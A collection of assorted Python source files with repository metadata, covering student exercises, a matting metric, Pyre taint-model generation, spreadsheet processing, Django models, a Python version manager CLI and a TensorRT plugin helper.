a330663f1e5ce3fc16f9eef56bfaed1bdf134cee | 2ed7f1e1f59832e91fe0402eca82ecf6fea2be40 | /0x05-python-exceptions/2-safe_print_list_integers.py | 70935bd34066cc1d54b184070aff6075e7e38cb5 | [] | no_license | Leidysalda/holbertonschool-higher_level_programming | abf3159db916ec293fc219b591e2c44f74afe3f3 | 46c04cdc7b76afbd79c650ff258f85aef7d2d5fe | refs/heads/master | 2020-09-29T02:40:47.437740 | 2020-09-23T05:37:10 | 2020-09-23T05:37:10 | 259,387,894 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | #!/usr/bin/python3
def safe_print_list_integers(my_list=[], x=0):
acum = 0
for i in range(0, x):
try:
print('{:d}'.format(my_list[i]), end='')
acum += 1
except (ValueError, TypeError):
pass
print('')
return (acum)
| [
"leidysalda1@gmail.com"
] | leidysalda1@gmail.com |
5efdcea0b197ce67a1ce02ffb34ddfc54e626264 | d88ede90d3434d56b00bdc530711208e1673b245 | /从字符串中提取省-市-区/main.py | 5c40573f246b912751d8027fc17bad7edbbbf992 | [] | no_license | SmallPotY/SmallUtil | 0ec84fab01ce7b46cf44f839ed0f7b2d63bad0cb | 0761283fc1f41ac909a1705aa3f31d925691189f | refs/heads/master | 2020-06-13T22:49:12.060011 | 2019-08-12T06:08:33 | 2019-08-12T06:08:33 | 194,813,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | # -*- coding:utf-8 -*-
import cpca
import os
path = os.path.dirname(__file__)
file = path + "/地址字符串.txt"
location_str = []
with open(file, 'r', encoding='utf-8') as f:
while True:
line = f.readline().splitlines()
if not line:
break
location_str.append(line[0])
# print(location_str)
df = cpca.transform(location_str, cut=False,pos_sensitive=True)
df.to_csv('省-市-区.csv', encoding="utf_8_sig")
| [
"1041132457@qq.com"
] | 1041132457@qq.com |
b12910bde72865270b33d213ed7d7729845c413b | c3b739b07214507bf1023b926c19d30784623e98 | /segme/metric/sad.py | 6a214ab8ef8f566f2f85cda2e1f6aa8e227f5ec3 | [
"MIT"
] | permissive | templeblock/segme | 20a96787500c46483cb7af0db917207fcedafb0b | 8192ed066558c1ea1e7283805b40da4baa5b3827 | refs/heads/master | 2023-08-30T12:31:39.327283 | 2021-11-11T17:08:40 | 2021-11-11T17:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,015 | py | import tensorflow as tf
from keras.metrics import SumOverBatchSize, metrics_utils
from keras.utils import losses_utils
from keras.utils.generic_utils import register_keras_serializable
@register_keras_serializable(package='SegMe')
class SAD(SumOverBatchSize):
def __init__(self, divider=255., name='sad', dtype=None):
"""Creates a `SumAbsoluteDifference` instance for matting task (by default downscales input by 255).
Args:
divider: A float value for input scaling.
name: (Optional) string name of the metric instance.
dtype: (Optional) data type of the metric result.
"""
super().__init__(name, dtype=dtype)
self.divider = divider
def update_state(self, y_true, y_pred, sample_weight=None):
y_true = tf.cast(y_true, self._dtype)
y_pred = tf.cast(y_pred, self._dtype)
if sample_weight is not None:
sample_weight = tf.cast(sample_weight, self._dtype)
[y_true, y_pred], sample_weight = metrics_utils.ragged_assert_compatible_and_get_flat_values(
[y_true, y_pred], sample_weight)
if sample_weight is None:
y_pred, y_true = losses_utils.squeeze_or_expand_dimensions(y_pred, y_true, sample_weight)
else:
y_pred, y_true, sample_weight = losses_utils.squeeze_or_expand_dimensions(y_pred, y_true, sample_weight)
values = sum_absolute_difference(y_true, y_pred, sample_weight)
return super().update_state(values / self.divider)
def result(self):
return super().result() / 1000.
def get_config(self):
config = super().get_config()
config.update({'divider': self.divider})
return config
def sum_absolute_difference(y_true, y_pred, sample_weight=None):
result = tf.abs(y_pred - y_true)
if sample_weight is not None:
result *= sample_weight
axis_hwc = list(range(1, result.shape.ndims))
result = tf.reduce_sum(result, axis=axis_hwc)
return result
| [
"shkarupa.alex@gmail.com"
] | shkarupa.alex@gmail.com |
1d3ab882c43c70cb14004d2256ccf46c2ffbd651 | 050ca74a2b304d49709050585424114f0a6bc1a7 | /tools/generate_taint_models/get_REST_api_sources.py | 01752c36104efc14cf8da804112946938b1fcb26 | [
"MIT"
] | permissive | tholiao/pyre-check | fcc1019c63ad27dcec920ecee1464c0507a68672 | f5705fb5dae6a78623a058e5972461e89e283634 | refs/heads/master | 2020-06-23T15:25:36.468656 | 2019-07-24T15:33:38 | 2019-07-24T15:33:38 | 198,662,804 | 0 | 0 | MIT | 2019-07-24T15:30:31 | 2019-07-24T15:30:30 | null | UTF-8 | Python | false | false | 1,357 | py | # Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import inspect
import types
from typing import Callable, Iterable
from .inspect_parser import extract_annotation, extract_name, extract_view_name
from .model import CallableModel
from .model_generator import Configuration, Registry
from .view_generator import ViewGenerator
class RESTApiSourceGenerator(ViewGenerator):
def compute_models(
self, functions_to_model: Iterable[Callable[..., object]]
) -> Iterable[str]:
entry_points = set()
for view_function in functions_to_model:
view_name = extract_view_name(view_function)
if view_name in Configuration.whitelisted_views:
continue
model = CallableModel(
callable=view_function,
arg="TaintSource[UserControlled]",
vararg="TaintSource[UserControlled]",
kwarg="TaintSource[UserControlled]",
whitelisted_parameters=Configuration.whitelisted_classes,
).generate()
if model is not None:
entry_points.add(model)
return sorted(entry_points)
Registry.register("get_REST_api_sources", RESTApiSourceGenerator)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
d8a2c27e6abe1ff0606d58ea519950a06e4de596 | 70f5264401822933a25a94101f648d385362b87b | /demo1.py | 6ba70b66f563d654ef5538db55f502ec3cb763c0 | [] | no_license | aspiringguru/COVID_data_analysis | aa859ecc5bc76b4c68a526efd52ae2fc0a8f67db | 86004246a7199807d3b7751f42d934ffe3e6bf41 | refs/heads/master | 2021-05-22T22:06:33.358741 | 2020-04-05T07:25:38 | 2020-04-05T07:25:38 | 253,117,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,860 | py | import pandas as pd
import os
mypath = "../data.bls.gov/unemployment_rate/"
file_list = []
for file in os.listdir(mypath):
if file.endswith(".xlsx"):
print(os.path.join(mypath, file))
file_list.append(os.path.join(mypath, file))
file_list
col_names = []
combined_results = pd.DataFrame(columns = col_names)
for filename in file_list:
# Read File
print("opening filename:", filename)
df = pd.read_excel(filename, sheet_name="BLS Data Series")
#df = pd.read_excel(file_list[0], sheet_name="BLS Data Series")
#df.shape
series_id = df.iloc[2,1]
print("series_id:", series_id)
series_id_text = df.iloc[4,1]
print("series_id_text:", series_id_text)
#now detect rownumber where data starts and ends.
#find row with first value of 'Year' in column 0
#and first non null value in column 0 after that.
first_col = df.iloc[:, 0]
#first_col
start_row_index = first_col[first_col == 'Year'].index[0]
#start_row_index
last_row_index = len(first_col)
#last_row_index
df_data = df.iloc[start_row_index+1:last_row_index,0:13]
#df_data
#df_info = df.iloc[4:9,0:2]
#df_data = df.iloc[11:32,0:13]
new_col_names = list(df.iloc[start_row_index, :])
#new_col_names
print("df_data.shape:", df_data.shape)
#print(df_data.head())
df_data.columns = new_col_names
#print(df_data.head())
#df_data
df_data_cleaned = pd.melt(df_data, id_vars=['Year'])
df_data_cleaned = df_data.melt('Year')
df_data_cleaned['date'] = df_data_cleaned['Year'].astype('str') + '-' + df_data_cleaned['variable']
#df_data_cleaned
df_data_cleaned.drop(['Year', 'variable'], axis=1, inplace=True)
#df_data_cleaned
df_data_cleaned.dropna(inplace=True)
df_data_cleaned.rename(columns={"value": series_id}, inplace=True)
#
print("df_data_cleaned\n", df_data_cleaned)
#series_id
#series_id_text
output_filename = filename+"_"+series_id+"_"+series_id_text+".csv"
print("saving as csv file:", output_filename)
df_data_cleaned[['date', series_id]].to_csv(output_filename, index=False)
#df_data_cleaned
#append x to combined_results
if len(combined_results.columns)==0:
print("combined_results is empty. combined_results.shape=", combined_results.shape)
combined_results = df_data_cleaned[['date', series_id]]
else:
print("combined_results not empty, joining column from df_data_cleaned")
#add the series_id column to combined_results (years should be the same)
combined_results[series_id] = df_data_cleaned[series_id]
print("after adding new data column, combined_results.shape:", combined_results.shape)
combined_results.to_csv(mypath+"combined_results.csv", index=False)
| [
"bmatthewtaylor@gmail.com"
] | bmatthewtaylor@gmail.com |
c7a6d37da7b8e7990c140909ac230c2be4083302 | 31ee112d47d3a2b2383498646eff5eb8c7368465 | /collective/scss/stylesheet.py | b1f5bf14ca3b9447bed8f60b56a3b2af06a037bd | [] | no_license | collective/collective.scss | acf7f8313d4584e0a0e2c08756f5bf8ed639149c | b4d86613d3be1d433a118033395416e84df4ad54 | refs/heads/master | 2023-07-15T10:01:19.302332 | 2011-11-25T23:34:21 | 2011-11-25T23:34:21 | 2,681,508 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | from Products.Five.browser import BrowserView
from scss import parser
class SCSSView(BrowserView):
"""SCSS base stylesheet view"""
def __call__(self):
# defer to index method, because that's what gets overridden by the template ZCML attribute
scss = self.index().encode('utf-8')
p = parser.Stylesheet()
css = str(p.loads(scss))
self.request.response.setHeader("Content-type", "text/css")
return css
| [
"toutpt@gmail.com"
] | toutpt@gmail.com |
4ae44a52ae0a90f5ce6d3046a79f21566eb04efa | 22dcd52b6a07e82e8db9bf8b7ad38711d12f69a8 | /venv/Lib/site-packages/sklearn/utils/seq_dataset.py | 738c8a6be16c864aebeade2eb9ded721332807e8 | [] | no_license | MrGreenPepper/music_cluster | 9060d44db68ae5e085a4f2c78d36868645432d43 | af5383a7b9c68d04c16c1086cac6d2d54c3e580c | refs/heads/main | 2023-08-15T09:14:50.630105 | 2021-10-01T09:45:47 | 2021-10-01T09:45:47 | 412,407,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py |
# THIS FILE WAS AUTOMATICALLY GENERATED BY deprecated_modules.py
import sys
from . import _seq_dataset
from ..externals._pep562 import Pep562
from ..utils.deprecation import _raise_dep_warning_if_not_pytest
deprecated_path = 'sklearn.utils.seq_dataset'
correct_import_path = 'sklearn.utils'
_raise_dep_warning_if_not_pytest(deprecated_path, correct_import_path)
def __getattr__(name):
return getattr(_seq_dataset, name)
if not sys.version_info >= (3, 7):
Pep562(__name__)
| [
"sebastian_truemper@posteo.de"
] | sebastian_truemper@posteo.de |
564fd5a85ad260577bd5d9828960654f8cfe79e5 | 0e448933dd67f9233e8dbd198ea6d27e6afd67d9 | /account/forms.py | 0a610959a986d3a1036d3f5c2db086249e5f414e | [] | no_license | achiengcindy/bookmarks | 1ef1d301508eb45775f724b6da2b343df8543fbb | e4c47b02f13bd55c2773775bc4843f63efa5264f | refs/heads/master | 2021-08-27T20:28:32.644574 | 2017-11-28T07:32:04 | 2017-11-28T07:32:04 | 111,144,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 911 | py | from django.contrib.auth.models import User
from django import forms
from .models import Profile
class LoginForm(forms.Form):
username = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
class UserRegistrationForm(forms.ModelForm):
password = forms.CharField(label='Password',
widget=forms.PasswordInput)
password2 = forms.CharField(label='Repeat password',widget=forms.PasswordInput)
class Meta:
model = User
fields = ('username', 'first_name', 'email')
def clean_password2(self):
cd = self.cleaned_data
if cd['password'] != cd['password2']:
raise forms.ValidationError('Passwords don\'t match.')
return cd['password2']
#user edit profile
class UserEditForm(forms.ModelForm):
class Meta:
model = User
fields = ('first_name', 'last_name', 'email')
class ProfileEditForm(forms.ModelForm):
class Meta:
model = Profile
fields = ('date_of_birth', 'photo') | [
"achiengcindy36@gmail.com"
] | achiengcindy36@gmail.com |
fd236e862a9bfd7c3bfe8192e30f9f77cfa9536d | cbb450f658bec796e26061bdeafcd1cc44ee1159 | /fzhtzj/fjhtzj/apps/news/migrations/0001_initial.py | e8f29fe37d553fa16e883eac1c3fe7a915ccbd1c | [] | no_license | ylz1990/htzj | 4ddd4701ead6a49d254ff6df94d9db6a69066a79 | 6bf1192032b985a484dc9b2221f17410eb4475dc | refs/heads/master | 2022-01-06T16:11:46.918336 | 2019-07-10T06:33:34 | 2019-07-10T06:33:34 | 192,693,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | # Generated by Django 2.2 on 2019-06-27 08:32
from django.db import migrations, models
import tinymce.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='News',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(help_text='标题', max_length=150, verbose_name='标题')),
('tags', models.CharField(help_text='新闻类型', max_length=200, verbose_name='新闻类型')),
('content', tinymce.models.HTMLField()),
('create_date', models.DateTimeField(auto_now=True, help_text='发布时间', verbose_name='发布时间')),
],
options={
'ordering': ['-create_date', '-id'],
'verbose_name': '新闻',
'verbose_name_plural': '新闻',
'db_table': 'tb_news',
},
),
]
| [
"pyvip@Vip.tz.cn"
] | pyvip@Vip.tz.cn |
cdea9475506ef06acc12eeb3f1d3d8b27d47ca55 | f26937e8cd0b07589ba1cf6275596d97488cda7e | /scrapySpider/mongoTest/build/lib/mongoTest/items.py | 29119a5da459eab04fe94c97ff82d545bd0fe6ff | [] | no_license | HezhouW/hive | 4aa46a045d22de121e2903075e74c3c9fd75ec1f | 3a7de0c18cbe0ec81e0b40c3217dd5b1a15cf464 | refs/heads/master | 2022-02-27T04:52:42.704501 | 2019-05-24T02:40:49 | 2019-05-24T02:40:49 | 123,524,369 | 1 | 0 | null | 2018-03-02T03:18:07 | 2018-03-02T03:18:07 | null | UTF-8 | Python | false | false | 349 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class MongotestItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
title = scrapy.Field()
movieName = scrapy.Field()
pass
| [
"954316227@qq.com"
] | 954316227@qq.com |
bec4142b26da34cb0e079f5600d4f9ab3ce563bf | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_070/ch32_2020_03_26_21_55_29_000008.py | 802d7b3dde9f7a743884523a2716fe29a7ee7fd9 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | def lista_primos(n):
a=2
i=3
x=0
lista=[0]*n
while x<n:
lista[x]=a
a+=1
if a%2==0:
while a%2==0 or (a%i==0 and a>i):
i=3
a+=1
while a%i!=0 and a>i:
i+=2
x+=1
else:
x+=1
return lista | [
"you@example.com"
] | you@example.com |
bc264ae9d065b64acd9d84fbc3f04a67c2052ea3 | 048c4c7a0a7956e976a0cd0512ca9536c8aeb82d | /tefla/core/image_quality.py | 455ca6156c6fccba2695fb40016fc2844ff044e9 | [
"MIT"
] | permissive | mkulariya1/tefla | 40d41242f08b4431a08f7dc6680088a234da5191 | 8de25c1b67dcf025535f5e8c40539de59acd7fb8 | refs/heads/master | 2020-04-24T15:46:51.866942 | 2019-02-04T18:33:49 | 2019-02-04T18:33:49 | 172,082,029 | 0 | 0 | NOASSERTION | 2019-02-22T14:41:53 | 2019-02-22T14:41:53 | null | UTF-8 | Python | false | false | 5,967 | py | """Python implementation of MS-SSIM."""
import numpy as np
from scipy import signal
from scipy.ndimage.filters import convolve
def FSpecialGauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function."""
radius = size // 2
offset = 0.0
start, stop = -radius, radius + 1
if size % 2 == 0:
offset = 0.5
stop -= 1
x, y = np.mgrid[offset + start:stop, offset + start:stop]
assert len(x) == size
g = np.exp(-((x**2 + y**2) / (2.0 * sigma**2)))
return g / g.sum()
def SSIMForMultiScale(img1, img2, max_val=255, filter_size=11, filter_sigma=1.5, k1=0.01, k2=0.03):
"""Return the Structural Similarity Map between `img1` and `img2`. This
function attempts to match the functionality of ssim_index_new.m by Zhou
Wang: http://www.cns.nyu.edu/~lcv/ssim/msssim.zip.
Args:
img1: Numpy array holding the first RGB image batch.
img2: Numpy array holding the second RGB image batch.
max_val: the dynamic range of the images (i.e., the difference between the
maximum the and minimum allowed values).
filter_size: Size of blur kernel to use (will be reduced for small images).
filter_sigma: Standard deviation for Gaussian blur kernel (will be reduced
for small images).
k1: Constant used to maintain stability in the SSIM calculation (0.01 in
the original paper).
k2: Constant used to maintain stability in the SSIM calculation (0.03 in
the original paper).
Returns:
Pair containing the mean SSIM and contrast sensitivity between `img1` and
`img2`.
Raises:
RuntimeError: If input images don't have the same shape or don't have four
dimensions: [batch_size, height, width, depth].
"""
if img1.shape != img2.shape:
raise RuntimeError('Input images must have the same shape (%s vs. %s).', img1.shape, img2.shape)
if img1.ndim != 4:
raise RuntimeError('Input images must have four dimensions, not %d', img1.ndim)
img1 = img1.astype(np.float64)
img2 = img2.astype(np.float64)
_, height, width, _ = img1.shape
# Filter size can't be larger than height or width of images.
size = min(filter_size, height, width)
# Scale down sigma if a smaller filter size is used.
sigma = size * filter_sigma / filter_size if filter_size else 0
if filter_size:
window = np.reshape(FSpecialGauss(size, sigma), (1, size, size, 1))
mu1 = signal.fftconvolve(img1, window, mode='valid')
mu2 = signal.fftconvolve(img2, window, mode='valid')
sigma11 = signal.fftconvolve(img1 * img1, window, mode='valid')
sigma22 = signal.fftconvolve(img2 * img2, window, mode='valid')
sigma12 = signal.fftconvolve(img1 * img2, window, mode='valid')
else:
# Empty blur kernel so no need to convolve.
mu1, mu2 = img1, img2
sigma11 = img1 * img1
sigma22 = img2 * img2
sigma12 = img1 * img2
mu11 = mu1 * mu1
mu22 = mu2 * mu2
mu12 = mu1 * mu2
sigma11 -= mu11
sigma22 -= mu22
sigma12 -= mu12
# Calculate intermediate values used by both ssim and cs_map.
c1 = (k1 * max_val)**2
c2 = (k2 * max_val)**2
v1 = 2.0 * sigma12 + c2
v2 = sigma11 + sigma22 + c2
ssim = np.mean((((2.0 * mu12 + c1) * v1) / ((mu11 + mu22 + c1) * v2)))
cs = np.mean(v1 / v2)
return ssim, cs
def MultiScaleSSIM(img1,
img2,
max_val=255,
filter_size=11,
filter_sigma=1.5,
k1=0.01,
k2=0.03,
weights=None):
"""Return the MS-SSIM score between `img1` and `img2`.
This function implements Multi-Scale Structural Similarity (MS-SSIM) Image
Quality Assessment according to Zhou Wang's paper, "Multi-scale structural
similarity for image quality assessment" (2003).
Link: https://ece.uwaterloo.ca/~z70wang/publications/msssim.pdf
Author's MATLAB implementation:
http://www.cns.nyu.edu/~lcv/ssim/msssim.zip
Args:
img1: Numpy array holding the first RGB image batch.
img2: Numpy array holding the second RGB image batch.
max_val: the dynamic range of the images (i.e., the difference between the
maximum the and minimum allowed values).
filter_size: Size of blur kernel to use (will be reduced for small images).
filter_sigma: Standard deviation for Gaussian blur kernel (will be reduced
for small images).
k1: Constant used to maintain stability in the SSIM calculation (0.01 in
the original paper).
k2: Constant used to maintain stability in the SSIM calculation (0.03 in
the original paper).
weights: List of weights for each level; if none, use five levels and the
weights from the original paper.
Returns:
MS-SSIM score between `img1` and `img2`.
Raises:
RuntimeError: If input images don't have the same shape or don't have four
dimensions: [batch_size, height, width, depth].
"""
if img1.shape != img2.shape:
raise RuntimeError('Input images must have the same shape (%s vs. %s).', img1.shape, img2.shape)
if img1.ndim != 4:
raise RuntimeError('Input images must have four dimensions, not %d', img1.ndim)
# Note: default weights don't sum to 1.0 but do match the paper / matlab code.
weights = np.array(weights if weights else [0.0448, 0.2856, 0.3001, 0.2363, 0.1333])
levels = weights.size
downsample_filter = np.ones((1, 2, 2, 1)) / 4.0
im1, im2 = [x.astype(np.float64) for x in [img1, img2]]
mssim = np.array([])
mcs = np.array([])
for _ in range(levels):
ssim, cs = SSIMForMultiScale(
im1, im2, max_val=max_val, filter_size=filter_size, filter_sigma=filter_sigma, k1=k1, k2=k2)
mssim = np.append(mssim, ssim)
mcs = np.append(mcs, cs)
filtered = [convolve(im, downsample_filter, mode='reflect') for im in [im1, im2]]
im1, im2 = [x[:, ::2, ::2, :] for x in filtered]
return (
np.prod(mcs[0:levels - 1]**weights[0:levels - 1]) * (mssim[levels - 1]**weights[levels - 1]))
| [
"mrinal.haloi11@gmail.com"
] | mrinal.haloi11@gmail.com |
4f32bf298e54f2f7987c626a660c4c19e9fadff2 | 9645bdfbb15742e0d94e3327f94471663f32061a | /Python/1034 - Coloring A Border/1034_coloring-a-border.py | 2b493c2baf0f2c8e7cf4f6570d80120a55d84abc | [] | no_license | aptend/leetcode-rua | f81c080b2260adb2da677612e5c437eda256781d | 80e44f4e9d3a5b592fdebe0bf16d1df54e99991e | refs/heads/master | 2023-06-22T00:40:05.533424 | 2021-03-17T13:51:28 | 2021-03-17T13:51:28 | 186,434,133 | 2 | 0 | null | 2023-06-21T22:12:51 | 2019-05-13T14:17:27 | HTML | UTF-8 | Python | false | false | 1,109 | py | from leezy import solution, Solution
class Q1034(Solution):
@solution
def colorBorder(self, grid, r0, c0, color):
# 152ms 87.36%
M, N = len(grid), len(grid[0])
old_c = grid[r0][c0]
dirs = [(1, 0), (-1, 0), (0, 1), (0, -1)]
def dfs(i, j, border):
is_border_cell = False
for di, dj in dirs:
ni, nj = i + di, j + dj
if not (0 <= ni < M and 0 <= nj < N):
is_border_cell = True
continue
if grid[ni][nj] != old_c:
if grid[ni][nj] != -1:
is_border_cell = True
continue
grid[i][j] = -1
dfs(ni, nj, border)
grid[i][j] = old_c
if is_border_cell:
border.append((i, j))
border = []
dfs(r0, c0, border)
for i, j in border:
grid[i][j] = color
return grid
def main():
q = Q1034()
q.add_args([[1, 1], [1, 2]], 0, 0, 3)
q.run()
if __name__ == '__main__':
main()
| [
"crescentwhale@hotmail.com"
] | crescentwhale@hotmail.com |
73a825ef1c4e66bae05685af1cb2546236b23287 | 651802447b606e46fe1aee0490458bf4261661a0 | /snafu/__main__.py | 9ef2a936acf4d4f5457ea42a60652dafd000886a | [
"ISC"
] | permissive | MysteriousSonOfGod/snafu | e90a9101dd41c0523c4da529c28fffbe1814b13f | ddcbf8dc8f26fbab6f352058d4b3e62fd01ea331 | refs/heads/master | 2022-03-01T15:19:37.822762 | 2019-10-28T06:31:03 | 2019-10-28T06:31:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,625 | py | import click
class SnafuGroup(click.Group):
"""Force command name to 'snafu'.
"""
def make_context(self, info_name, *args, **kwargs):
return super().make_context('snafu', *args, **kwargs)
@click.group(cls=SnafuGroup, invoke_without_command=True)
@click.option('--version', is_flag=True, help='Print version and exit.')
@click.pass_context
def cli(ctx, version):
if ctx.invoked_subcommand is None:
if version:
from . import __version__
click.echo('SNAFU {}'.format(__version__))
else:
click.echo(ctx.get_help(), color=ctx.color)
ctx.exit(1)
@cli.command(help='Install a Python version.')
@click.argument('version')
@click.option('--use', is_flag=True, help='Use version after installation.')
@click.option(
'--file', 'from_file', type=click.Path(exists=True),
help='Specify an installer to not downloading one.',
)
def install(**kwargs):
from .operations.install import install
install(**kwargs)
@cli.command(help='Uninstall a Python version.')
@click.argument('version')
@click.option(
'--file', 'from_file', type=click.Path(exists=True),
help='Specify an uninstaller to not relying on auto-discovery.',
)
def uninstall(**kwargs):
from .operations.install import uninstall
uninstall(**kwargs)
@cli.command(help='Upgrade an installed Python version.')
@click.argument('version')
@click.option('--pre', is_flag=True, help='Include pre-releases.')
@click.option(
'--file', 'from_file', type=click.Path(exists=True),
help='Specify path to installer to not downloading one.',
)
@click.pass_context
def upgrade(ctx, **kwargs):
from .operations.install import upgrade
upgrade(ctx, **kwargs)
@cli.command(help='Download installer of given Python version.')
@click.argument('version')
@click.option(
'--dest', 'dest_dir', type=click.Path(exists=True, file_okay=False),
help='Download installer to this directory.',
)
@click.option('--force', is_flag=True, help='Overwrite target if exists.')
@click.pass_context
def download(ctx, **kwargs):
from .operations.download import download
download(ctx, **kwargs)
@cli.command(help='Set active Python versions.')
@click.argument('version', nargs=-1)
@click.option(
'--add/--reset', default=None, help='Add version to use without removing.',
)
@click.pass_context
def use(ctx, **kwargs):
from .operations.link import use
use(ctx, **kwargs)
@cli.command(
help='Prints where the executable of Python version is.',
short_help='Print python.exe location.',
)
@click.argument('version')
def where(**kwargs):
from .operations.versions import where
where(**kwargs)
@cli.command(name='list', help='List Python versions.')
@click.option(
'--all', 'list_all', is_flag=True,
help='List all versions (instead of only installed ones).',
)
def list_(**kwargs):
from .operations.versions import list_
list_(**kwargs)
@cli.command(
short_help='Link a command from active versions.',
help=('Link a command, or all commands available based on the currently '
'used Python version(s).'),
)
@click.argument('command', required=False)
@click.option(
'--all', 'link_all', is_flag=True,
help='Link all available operations.',
)
@click.option(
'--overwrite',
type=click.Choice(['yes', 'no', 'smart']), default='yes',
help='What to do when the target exists.',
)
@click.pass_context
def link(ctx, overwrite, **kwargs):
from .operations.link import link, Overwrite
link(ctx, overwrite=Overwrite[overwrite], **kwargs)
if __name__ == '__main__':
cli()
| [
"uranusjr@gmail.com"
] | uranusjr@gmail.com |
c793e91c6245dd84a9885fc97963c0193af6dcff | 1ae95a907eda38bc49dba5ce24309a0d134a2fd8 | /vladetina1/asgi.py | ede8d3a4e475252fb3a279974f137e0c6ed195b8 | [] | no_license | ivanurban/vladetina_1-webapp | e43472edbf87485d1b606c9827988f7353adcf02 | c37eea232b2fde654cb2de006a2c3d2fea838047 | refs/heads/master | 2022-12-08T04:56:11.729653 | 2020-08-28T22:36:35 | 2020-08-28T22:36:35 | 289,579,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
ASGI config for vladetina1 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'vladetina1.settings')
application = get_asgi_application()
| [
"ivanurban_bg@yahoo.com"
] | ivanurban_bg@yahoo.com |
e3860c147e56b05bdb47ca332ac3184f12e860cd | 3326e1455f857704d144d069ffd0291ef3da830e | /torch2trt_dynamic/plugins/create_gridsample_plugin.py | d42250f0bd94f558c33dc7cb0ab0ea86bf1ecba4 | [
"MIT"
] | permissive | AlanLu0808/torch2trt_dynamic | efc5b3d6cbaffffa43ad28f107ab3588bf135d5e | df864f906a8ae0b7b98680c1612903bdea58c744 | refs/heads/master | 2023-04-30T12:52:20.907104 | 2021-05-09T03:28:19 | 2021-05-09T03:28:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | import numpy as np
import tensorrt as trt
def create_gridsample_plugin(layer_name, mode, padding_mode, align_corners):
creator = trt.get_plugin_registry().get_plugin_creator(
'GridSamplePluginDynamic', '1', '')
pfc = trt.PluginFieldCollection()
pf_mode = trt.PluginField("mode", np.array([mode], dtype=np.int32),
trt.PluginFieldType.INT32)
pfc.append(pf_mode)
pf_padding_mode = trt.PluginField("padding_mode",
np.array([padding_mode], dtype=np.int32),
trt.PluginFieldType.INT32)
pfc.append(pf_padding_mode)
pf_align_corners = trt.PluginField(
"align_corners", np.array([align_corners], dtype=np.int32),
trt.PluginFieldType.INT32)
pfc.append(pf_align_corners)
return creator.create_plugin(layer_name, pfc)
| [
"streetyao@live.com"
] | streetyao@live.com |
6164689de25188831b5f04895aff856313ea43e2 | 9495b91cbed933a55be172c2397c4083b5354faa | /app/user/models.py | 0049a926fd00e9db2e3cfc84072e7112ed029ab6 | [] | no_license | huyquyet/MMS_project | 2f20fff079d201716bdd3f38f204dc3d06f1bada | 01596fe39b41b4c1de29b15233fdf22639a21770 | refs/heads/master | 2021-01-10T10:09:44.045152 | 2015-11-16T10:37:41 | 2015-11-16T10:37:41 | 45,814,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from MMS_project import settings
from app.position.models import Position
from app.team.models import Team
class Profile(models.Model):
    """Per-user profile data attached one-to-one to Django's built-in User."""
    user = models.OneToOneField(User, related_name='profile')
    # NOTE(review): 'avata' looks like a typo for 'avatar', but renaming the
    # field would require a schema migration and template updates — left as-is.
    avata = models.ImageField(upload_to=settings.AVATA_DIR, max_length=255, default='avata/default.jpg', blank=False)
    description = models.TextField(default='', null=True)
    # Defaults reference fixed primary keys (team pk=4, position pk=1);
    # presumably those rows are seeded elsewhere — TODO confirm.
    team = models.ForeignKey(Team, related_name='user', default=4, null=True)
    position = models.ForeignKey(Position, related_name='profile', default=1, null=True)
    # def delete(self, *args, **kwargs):
    # self.user.delete()
    # return super(self.__class__, self).delete(*args, **kwargs)
| [
"nguyenhuyquyet90@gmail.com"
] | nguyenhuyquyet90@gmail.com |
5c4f76c6e2b0ef09d415ea9640c17610cfa0689b | 01fa2aca31eb73a559d192fd29e44350f26a13a9 | /HAX/18.CocoJoe/script.module.civitasscrapers/lib/civitasscrapers/sources_civitasscrapers/en/reddit.py | 4cd237137522d81a2fb22aa55a6be1f0a9cdb1f0 | [] | no_license | RandomIntermition/k4y108837s | b4beedeff375645bd4fa9ad348631a9a9f3640b6 | e9115aad49795dfe30a96c278cedaf089abcc11d | refs/heads/master | 2022-05-01T18:45:57.298903 | 2022-03-30T03:41:08 | 2022-03-30T03:41:08 | 109,356,425 | 1 | 0 | null | 2019-11-08T02:20:47 | 2017-11-03T05:36:48 | Python | UTF-8 | Python | false | false | 2,249 | py | # -*- coding: utf-8 -*-
'''
Eggman Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
